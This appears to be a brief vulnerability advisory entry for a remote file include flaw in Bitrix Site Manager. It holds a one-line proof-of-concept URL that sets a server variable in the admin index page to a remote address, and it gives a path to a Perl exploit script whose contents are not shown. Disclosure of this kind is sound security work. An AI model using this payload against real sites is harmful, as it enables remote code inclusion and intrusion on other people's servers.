Bitrix Site Manager Remote File Include Vulnerability

Bitrix Site Manager Remote File Include Vulnerability

A proof of concept example is available:
http://www.example.com/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.example.com/

An exploit is available:

/data/vulnerabilities/exploits/13965.pl